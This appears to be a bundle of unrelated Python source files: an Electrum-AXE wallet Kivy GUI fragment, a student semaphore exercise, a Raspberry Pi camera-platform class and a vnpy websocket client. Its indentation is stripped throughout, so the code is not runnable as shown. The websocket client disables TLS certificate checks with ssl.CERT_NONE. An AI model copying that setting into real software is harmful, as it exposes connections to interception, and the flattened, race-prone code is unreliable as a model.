popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum_axe.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum_axe/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.axe.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum_axe/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for axe: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
Logger.debug('Electrum-AXE: Wallet not found or action needed. Launching install wizard')
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum_axe/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum_axe/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_axe.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_axe.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_axe_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_axe_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum-axe.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum_axe.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum-AXE', message,
app_icon=icon, app_name='Electrum-AXE')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum_axe/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum_axe/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum_axe/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast_transaction(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg[:500] if msg else _('There was an error broadcasting the transaction.')
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
proyecto2.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Sistemas Operativos
# Rene Vazquez Peñaloza
import random
import threading
import time
#En esta variable se define en numero de clientes que puede haber conectados al servidor
UsuariosConectados=2
#Se definen los multiplex que nos permiten controlar el flujo en cada direccion
multiplexConsulta = threading.Semaphore(UsuariosConectados)
multiplexGuardar = threading.Semaphore(UsuariosConectados)
def esSeguroConsultar():
if (numUsuariosGuardando - (numUsuariosConsultando + 1)) == 0:
return False
return True
def esSeguroGuardar():
if (numUsuariosConsultando - (numUsuariosGuardando + 1)) == 0:
return False
return True
#Estas variables nos permiten decidir si es seguro consultar o guardar.
numUsuariosConsultando = 0
numUsuariosGuardando = 0
mutexAGuardar = threading.Semaphore(0)
mutexAConsulta = threading.Semaphore(0)
sepuedeConsultar = esSeguroConsultar()
sepuedeGuardar = esSeguroGuardar()
#Con 1 Consulta con 0 Guarda
def elegirAccion():
if random.random() < 0.5:
return 1
else:
return 0
AConsulta=set()
AGuardar = set()
Lectura = set()
class Usuario():
def __init__(self, nombre):
global numUsuariosGuardando
global numUsuariosConsultando
self.nombre = nombre
self.accionActual = -1
#print(self.nombre + " está en espera")
self.isWaiting = True
Lectura.add(self)
def __str__(self):
accion = "de consulta" if self.accionActual == 1 else "de guardar"
return self.nombre + " está realizando " + accion
def eventos(self):
global numUsuariosGuardando
global numUsuariosConsultando
global sepuedeGuardar
global sepuedeConsultar
"""mutexAGuardar.acquire()
sepuedeConsultar = esSeguroConsultar()
mutexAGuardar.release()
mutexAGuardar.acquire()
sepuedeGuardar = esSeguroGuardar()
mutexAGuardar.release()"""
itera = 1
while(True):
nuevaAccion = elegirAccion()
if nuevaAccion == self.accionActual:
tmp = "de sentido del reloj" if self.accionActual == 1 else "contra reloj"
continue
if self.isWaiting:
Lectura.remove(self)
if nuevaAccion == 1 and itera == 1 and sepuedeConsultar:
#Quiere decir que la accion que realizaba era consulta
multiplexConsulta.acquire()
AConsulta.add(self)
self.accionActual = 1
self.isWaiting = False
numUsuariosConsultando+=1
#print(self)
continue
elif nuevaAccion == 0 and itera == 1 and sepuedeGuardar:
multiplexGuardar.acquire()
AGuardar.add(self)
self.accionActual = 0
self.isWaiting = False
numUsuariosGuardando+=1
#print(self)
continue
if nuevaAccion == 1:
multiplexGuardar.release()
AGuardar.remove(self)
elif nuevaAccion == 0:
multiplexConsulta.release()
AConsulta.remove(self)
if nuevaAccion == 1 and sepuedeConsultar:
multiplexConsulta.acquire()
AConsulta.add(self)
self.accionActual = 1
self.isWaiting = False
numUsuariosConsultando+=1
numUsuariosGuardando -= 1
#print(self)
elif nuevaAccion == 0 and sepuedeConsultar:
multiplexGuardar.acquire()
AGuardar.add(self)
self.accionActual = 0
self.isWaiting = False
numUsuariosGuardando+=1
numUsuariosConsultando -= 1
#print(self)
else:
Lectura.add(self)
self.isWaiting = True
elif not self.isWaiting:
Lectura.add(self)
self.isWaiting = True
itera += 1
time.sleep(5)
def getStatus():
while(True):
string="************************************\n"
string += "Usuarios consultando[ " + "*"*len(AConsulta)+" ]\n"
for Usuario in AConsulta:
string += " ** "+Usuario.nombre+"\n"
string += "Usuarios guardando[ " + "*"*len(AGuardar)+" ]\n\n"
for Usuario in AGuardar:
string += " ** "+Usuario.nombre+"\n"
time.sleep(5)
print(string)
def main():
rene = Usuario("Rene")
bruno = Usuario("Bruno")
daniel = Usuario("Daniel")
diego = Usuario("Diego")
rafael = Usuario("Rafael")
edith = Usuario("Edith")
cliente=[rene, bruno, daniel, diego, rafael, edith]
print("*"*30)
hilos = []
hilos.append(threading.Thread(target=getStatus))
for usuario in cliente:
hilo = threading.Thread(target=usuario.eventos)
hilos.append(hilo)
for hilo in hilos:
hilo.start()
if __name__ =="__main__":
main()
|
platform.py
|
from typing import Dict, Tuple
from queue import Queue, Empty
from threading import Thread
from time import sleep
from rpicam.cams.cam import Cam
from rpicam.servo.servo import Servo
from rpicam.utils.logging_utils import get_logger
class Platform:
CAM_RES_POLL_TIMEOUT = 2
def __init__(
self, cam: Cam, servos: Dict[Tuple[str, str], Servo] = None, verbose: bool = False
):
self.cam = cam
self.servos = servos if servos is not None else {}
self._logger = get_logger(self.__class__.__name__, verb=verbose)
self._cam_in_q = Queue()
self._cam_out_q = Queue()
self._servo_in_qs = {k: Queue() for k in self.servos.keys()}
self._cam_thread = Thread(target=self._cam_worker, name='cam_worker', daemon=False)
self._servo_threads = [
Thread(target=self._servo_worker, kwargs=dict(servo_name=sn), daemon=True)
for sn in self.servos.keys()
]
self._cam_thread.start()
sleep(Platform.CAM_RES_POLL_TIMEOUT) # initial sleep for cam setup before servos start
for st in self._servo_threads:
st.start()
def __del__(self):
self._cam_in_q.join()
self._cam_out_q.join()
def _cam_worker(self):
keep_alive = True
while keep_alive:
args, kwargs, keep_alive = self._cam_in_q.get()
self._logger.info(f'Starting recording: args={args}, kwargs={kwargs}')
res = self.cam.record(*args, **kwargs)
self._logger.info('Recording done.')
self._cam_in_q.task_done()
self._cam_out_q.put(res)
def _servo_worker(self, servo_name: Tuple[str, str]):
while True:
args, kwargs = self._servo_in_qs[servo_name].get()
self.servos[servo_name].execute_sequence(*args, **kwargs)
self._servo_in_qs[servo_name].task_done()
def poll_cam_result(self):
while True:
try:
return self._cam_out_q.get(timeout=self.CAM_RES_POLL_TIMEOUT)
except Empty:
pass
def start_recording(self, keep_alive: bool = False, *args, **kwargs):
"""
Start recording on `self.cam` with the given arguments.
:param keep_alive: Whether to keep the camera thread alive after this
recording concludes. This prevents the main thread
from exiting.
:param args: arguments passed on to `self.cam.record()`
:param kwargs: keyword arguments passed on to `self.cam.record()`
"""
self._cam_in_q.put((args, kwargs, keep_alive))
def submit_servo_sequence(self, servo_name: Tuple[str, str], *args, **kwargs):
"""
Submit a servo operation sequence to the servo with name `servo_name`.
Execution will terminate after the cam worker thread is ended.
:param servo_name: The name of the servo as given in `self.servos`.
:param args: arguments passed on to the `execute_sequence` function of the requested servo.
:param kwargs: keyword arguments passed on the the `execute_sequence` function of the requested servo.
"""
self._servo_in_qs[servo_name].put((args, kwargs))
|
websocket_client.py
|
import json
import logging
import socket
import ssl
import sys
import traceback
from datetime import datetime
from threading import Lock, Thread
from time import sleep
from typing import Optional
import websocket
from vnpy.trader.utility import get_file_logger
class WebsocketClient:
"""
Websocket API
After creating the client object, use start() to run worker and ping threads.
The worker thread connects websocket automatically.
Use stop to stop threads and disconnect websocket before destroying the client
object (especially when exiting the programme).
Default serialization format is json.
Callbacks to overrides:
* unpack_data
* on_connected
* on_disconnected
* on_packet
* on_error
After start() is called, the ping thread will ping server every 60 seconds.
If you want to send anything other than JSON, override send_packet.
"""
def __init__(self):
"""Constructor"""
self.host = None
self._ws_lock = Lock()
self._ws = None
self._worker_thread = None
self._ping_thread = None
self._active = False
self.proxy_host = None
self.proxy_port = None
self.ping_interval = 60 # seconds
self.header = {}
self.logger: Optional[logging.Logger] = None
# For debugging
self._last_sent_text = None
self._last_received_text = None
self.count = 0
def init(self,
host: str,
proxy_host: str = "",
proxy_port: int = 0,
ping_interval: int = 60,
header: dict = None,
log_path: Optional[str] = None,
):
"""
:param host:
:param proxy_host:
:param proxy_port:
:param header:
:param ping_interval: unit: seconds, type: int
:param log_path: optional. file to save log.
"""
self.host = host
self.ping_interval = ping_interval # seconds
if log_path is not None:
self.logger = get_file_logger(log_path)
self.logger.setLevel(logging.DEBUG)
if header:
self.header = header
if proxy_host and proxy_port:
self.proxy_host = proxy_host
self.proxy_port = proxy_port
def start(self):
"""
Start the client and on_connected function is called after webscoket
is connected succesfully.
Please don't send packet untill on_connected fucntion is called.
"""
self._active = True
self._worker_thread = Thread(target=self._run)
self._worker_thread.start()
self._ping_thread = Thread(target=self._run_ping)
self._ping_thread.start()
def stop(self):
"""
Stop the client.
"""
self._active = False
self._disconnect()
def join(self):
"""
Wait till all threads finish.
This function cannot be called from worker thread or callback function.
"""
self._ping_thread.join()
self._worker_thread.join()
def send_packet(self, packet: dict):
"""
Send a packet (dict data) to server
override this if you want to send non-json packet
"""
text = json.dumps(packet)
self._record_last_sent_text(text)
return self._send_text(text)
def _log(self, msg, *args):
logger = self.logger
if logger:
logger.debug(msg, *args)
def _send_text(self, text: str):
"""
Send a text string to server.
"""
ws = self._ws
if ws:
ws.send(text, opcode=websocket.ABNF.OPCODE_TEXT)
self._log('sent text: %s', text)
def _send_binary(self, data: bytes):
"""
Send bytes data to server.
"""
ws = self._ws
if ws:
ws._send_binary(data)
self._log('sent binary: %s', data)
def _create_connection(self, *args, **kwargs):
""""""
return websocket.create_connection(*args, **kwargs)
def _ensure_connection(self):
""""""
triggered = False
with self._ws_lock:
if self._ws is None:
self._ws = self._create_connection(
self.host,
sslopt={"cert_reqs": ssl.CERT_NONE},
http_proxy_host=self.proxy_host,
http_proxy_port=self.proxy_port,
header=self.header
)
triggered = True
if triggered:
self.on_connected()
def _disconnect(self):
"""
"""
triggered = False
with self._ws_lock:
if self._ws:
ws: websocket.WebSocket = self._ws
self._ws = None
triggered = True
if triggered:
ws.close()
self.on_disconnected()
def _run(self):
"""
Keep running till stop is called.
"""
try:
while self._active:
try:
self._ensure_connection()
ws = self._ws
if ws:
text = ws.recv()
# ws object is closed when recv function is blocking
self.count += 1
#if not text or (self.count % 5000 == 2000 and self.count < 20000):
if not text:
self._disconnect()
#sleep(10)
continue
self._record_last_received_text(text)
try:
data = self.unpack_data(text)
except ValueError as e:
print("websocket unable to parse data: " + text)
raise e
self._log('recv data: %s', data)
self.on_packet(data)
# ws is closed before recv function is called
# For socket.error, see Issue #1608
except (
websocket.WebSocketConnectionClosedException,
websocket.WebSocketBadStatusException,
socket.error,
TypeError
):
self._disconnect()
# other internal exception raised in on_packet
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._disconnect()
@staticmethod
def unpack_data(data: str):
"""
Default serialization format is json.
override this method if you want to use other serialization format.
"""
return json.loads(data)
def _run_ping(self):
""""""
while self._active:
try:
self._ping()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
# self._run() will reconnect websocket
sleep(1)
for i in range(self.ping_interval):
if not self._active:
break
sleep(1)
def _ping(self):
""""""
ws = self._ws
if ws:
ws.send("ping", websocket.ABNF.OPCODE_PING)
@staticmethod
def on_connected():
"""
Callback when websocket is connected successfully.
"""
pass
@staticmethod
def on_disconnected():
"""
Callback when websocket connection is lost.
"""
pass
@staticmethod
def on_packet(packet: dict):
"""
Callback when receiving data from server.
"""
pass
def on_error(self, exception_type: type, exception_value: Exception, tb):
"""
Callback when exception raised.
"""
sys.stderr.write(
self.exception_detail(exception_type, exception_value, tb)
)
return sys.excepthook(exception_type, exception_value, tb)
def exception_detail(
self, exception_type: type, exception_value: Exception, tb
):
"""
Print detailed exception information.
"""
text = "[{}]: Unhandled WebSocket Error:{}\n".format(
datetime.now().isoformat(), exception_type
)
text += "LastSentText:\n{}\n".format(self._last_sent_text)
text += "LastReceivedText:\n{}\n".format(self._last_received_text)
text += "Exception trace: \n"
text += "".join(
traceback.format_exception(exception_type, exception_value, tb)
)
return text
def _record_last_sent_text(self, text: str):
"""
Record last sent text for debug purpose.
"""
self._last_sent_text = text[:1000]
